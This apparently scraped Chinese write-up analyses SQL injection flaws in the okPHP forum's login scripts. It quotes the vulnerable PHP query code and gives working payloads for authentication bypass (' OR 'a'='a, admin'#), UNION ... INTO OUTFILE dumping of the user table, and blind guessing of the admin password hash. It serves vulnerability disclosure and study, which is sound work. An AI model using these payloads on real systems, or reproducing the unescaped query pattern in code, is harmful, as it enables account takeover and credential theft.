<div class="codebody" id="code86494"> $conn=sql_connect($dbhost,$dbuser,$dbpswd,$dbname); $password = md5($password); $q = "select id,group_id from $user_table where username='$username' and password='$password'"; $res = sql_query($q,$conn); $row = sql_fetch_row($res); $q = "select id,group_id from $user_table where username='$username' and password='$password'"中
$username 和 $password 没过滤, 很容易就绕过。 对于select from $user_table where username='$username' and password='$password'这样的语句改造的方法有: 构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a 相当于sql语句: select from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a' 构造2(利用MysqL里的注释语句# ,/ 把$password注释掉):$username=admin'#(或admin'/) 即: select from $user_table where username='admin'#' and password='$password'" 相当于: select from $user_table where username='admin' 在admin/login.PHP中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2: select id,group_id from $user_table where username='admin'#' and password='$password'" 相当于: select id,group_id from $user_table where username='admin' 只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id, 我们就可以这样构造:$username=' OR id=1# 相当于: select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉) 我们接着往下看代码: <div class="codetitle"><a style="CURSOR: pointer" data="78208" class="copybut" id="copybut78208" onclick="doCopy('code78208')">代码如下:
<div class="codebody" id="code78208"> if ($row[0]) { // If not admin or super moderator if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { $login = 0; } else { $login = 1; } } // Fail to login--------------- if (!$login) { write_log("Moderator login","0","password wrong"); echo " "; exit(); } // Access ! ------------- else { session_start();
变量$forum_id没有过滤,因为MysqL不支持子查询,我们可以利用union构造语句进行联合查询(要求MysqL版本在4.00以上)实现跨库操作,我们构造如下: 构造1:利用 SELECT FROM table INTO OUTFILE '/path/file.txt'(要求MysqL有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id: $forum_id=' union select from user_table into outfile '/path/file.txt' 以下: $q = "select name,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'"; 上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使MysqL报错而得到),而且PHP的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过: 构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在PHP里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《PHP注入实例》。下面我就结合okPHP给个利用“返回结果不同”注射的例子:(见漏洞5)。 5.admin/login.PHP和users/login.PHP通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。) 问题代码同漏洞1。 语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了): $username=admin' AND LENGTH(password)=6# sql语句变成: $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'" 相当于: $q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'" 如果LENGTH(password)=6成立,则正常返回,如果不成立,MysqL就会报错。 这样我们就可以猜解用户admin密码hash了。如$username=admin' ord(substring(password,1,1))=57# 可以猜用户的密码第一位的ascii码值............。